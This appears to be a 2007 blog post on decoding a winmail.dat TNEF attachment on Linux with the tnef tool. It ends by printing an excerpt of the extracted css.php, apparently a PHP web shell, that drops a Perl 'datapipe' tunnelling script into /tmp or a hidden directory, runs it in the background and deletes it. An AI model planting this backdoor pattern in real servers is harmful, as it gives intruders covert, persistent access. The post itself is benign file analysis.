Thursday, March 01, 2007

Transport Neutral Encapsulation Format

Someone has sent this file to me and telling me that something is wrong with this file, the file name is winmail.dat. I was wondering what's is contained in the file and as usual I check on the file type -

shell>file winmail.dat
winmail.dat: Transport Neutral Encapsulation Format

I haven't seen this file type before, while I'm wondering why, wiki seems to answer my question in pretty details -

http://en.wikipedia.org/wiki/Transport_Neutral_Encapsulation_Format


Okay, so I have never been a Outlook user, now I need to look at how to decode the file properly, I found this simple trick using tnef,

shell>eix tnef


net-mail/tnef
Available versions: 1.3.3 1.3.4 ~1.4.3
Installed: 1.3.4(18:07:41 02/22/07)
Homepage: http://world.std.com/~damned/software.html
Description: Decodes MS-TNEF MIME attachments

Eix is gentoo tool that similar to debian apt-cache which allows you to search for the applications in the portage, installing it is pretty quick -

shell>emerge -v tnef


Once it is installed, I can easily list the attachment in the TNEF file -

shell>tnef -f winmail.dat -t

css.php

To extract the attachment and save the message in the body into the desired directory, I just need to run -

shell>tnef -f winmail.dat --save-body -C tnef-dir/

shell>cd tnef-dir/

shell>/tnef-dir $ ls -al

total 100
drwxr-xr-x 2 geek00l geek00l 4096 Feb 22 18:17 .
drwxr-xr-x 44 geek00l geek00l 4096 Feb 22 18:10 ..
-rw-r--r-- 1 geek00l geek00l 82942 Feb 22 18:17 css.php
-rw-r--r-- 1 geek00l geek00l 1454 Feb 22 18:17 message.rtf

Here's the partial contents in css.php that looks interesting -

if(is_writable("/tmp")){
$fp=fopen("/tmp/nst_perl_datapipe.pl","w");
fwrite($fp,"$datapipe_pl");
passthru("perl /tmp/nst_perl_datapipe.pl &");
unlink("/tmp/nst_perl_datapipe.pl");
}else{
if(is_writable(".")){
mkdir(".nst_datapipe_tmp");
$fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w");
fwrite($fp,"$datapipe_pl");
passthru("perl .nst_datapipe_tmp/nst_perl_datapipe.pl &");
unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl");
rmdir(".nst_datapipe_tmp");
}
}


I just learned the new file format and the way to read TNEF file without using Windows, have fun!

Enjoy (;])

No comments: